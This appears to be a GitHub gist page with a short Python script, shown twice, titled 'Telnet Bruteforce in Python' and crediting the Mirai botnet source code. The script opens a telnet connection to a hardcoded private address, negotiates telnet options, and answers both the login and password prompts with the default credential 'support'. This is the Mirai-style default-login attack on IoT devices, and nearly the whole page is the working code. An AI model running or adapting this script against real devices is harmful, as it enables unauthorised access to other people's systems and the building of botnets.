Created
April 15, 2020 14:33
-
-
Save aaaddress1/7bef750bd6cc56aa5c275e0317c6e4f2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Telnet Bruteforce in Python, by aaaddress1@chroot.org | |
# ref: https://github.com/jgamblin/Mirai-Source-Code | |
import socket | |
import sys | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(('10.118.127.36', 23)) | |
#s.send(b'\xff\xfc\x23\xff\xfa\x1f\x00\xa0\x00\x39\xff\xf0\xff\xfd\x01') | |
def recvTelnet(): | |
data = s.recv(1024) | |
print('data size: ', len(data)) | |
p = 0 | |
if 0xff not in data: # get prompt? | |
print(data) | |
if b'Password:' in data: | |
s.send(b'support\n') | |
elif b'login:' in data: | |
s.send(b'support\n') | |
return | |
while p < len(data): | |
if data[p + 0] != 0xff: break | |
if data[p + 1] == 0xff: | |
p += 1 | |
continue | |
if data[p + 1] == 0xfd: # telnetd say "DO" | |
print('telnetd["DO"]: ', (data[p+2]) ) | |
if data[p + 2] == 0x1f: | |
tmp1 = [255, 251, 31] | |
tmp2 = [255, 250, 31, 0, 80, 0, 24, 255, 240] | |
s.send(bytearray( tmp1 )) | |
s.send(bytearray( tmp2 )) | |
print('send window size') | |
else: | |
# but I say "Won't" | |
print('send:',bytearray([0xff, 0xfc, data[p + 2]]) ) | |
s.send( bytearray([0xff, 0xfc, data[p + 2]]) ) | |
print("") | |
elif data[p + 1] == 0xfb: # telnetd say "WILL",and I say "DO" | |
print('telnetd["WILL"]: ', (data[p+2]) ) | |
print('send:',bytearray([0xff, 0xfd, data[p + 2]]) ) | |
s.send( bytearray([0xff, 0xfd, data[p + 2]]) ) | |
print("") | |
p += 3 | |
for x in range(1,11): | |
print('-' * 25 + ' recving#%x ' % x + '-' * 25) | |
recvTelnet() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Telnet Bruteforce in Python, by aaaddress1@chroot.org | |
# ref: https://github.com/jgamblin/Mirai-Source-Code | |
import socket | |
import sys | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(('10.118.127.36', 23)) | |
#s.send(b'\xff\xfc\x23\xff\xfa\x1f\x00\xa0\x00\x39\xff\xf0\xff\xfd\x01') | |
def recvTelnet(): | |
data = s.recv(1024) | |
print('data size: ', len(data)) | |
p = 0 | |
if 0xff not in data: # get prompt? | |
print(data) | |
if b'Password:' in data: | |
s.send(b'support\n') | |
elif b'login:' in data: | |
s.send(b'support\n') | |
return | |
while p < len(data): | |
if data[p + 0] != 0xff: break | |
if data[p + 1] == 0xff: | |
p += 1 | |
continue | |
if data[p + 1] == 0xfd: # telnetd say "DO" | |
print('telnetd["DO"]: ', (data[p+2]) ) | |
if data[p + 2] == 0x1f: | |
tmp1 = [255, 251, 31] | |
tmp2 = [255, 250, 31, 0, 80, 0, 24, 255, 240] | |
s.send(bytearray( tmp1 )) | |
s.send(bytearray( tmp2 )) | |
print('send window size') | |
else: | |
# but I say "Won't" | |
print('send:',bytearray([0xff, 0xfc, data[p + 2]]) ) | |
s.send( bytearray([0xff, 0xfc, data[p + 2]]) ) | |
print("") | |
elif data[p + 1] == 0xfb: # telnetd say "WILL",and I say "DO" | |
print('telnetd["WILL"]: ', (data[p+2]) ) | |
print('send:',bytearray([0xff, 0xfd, data[p + 2]]) ) | |
s.send( bytearray([0xff, 0xfd, data[p + 2]]) ) | |
print("") | |
p += 3 | |
for x in range(1,11): | |
print('-' * 25 + ' recving#%x ' % x + '-' * 25) | |
recvTelnet() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment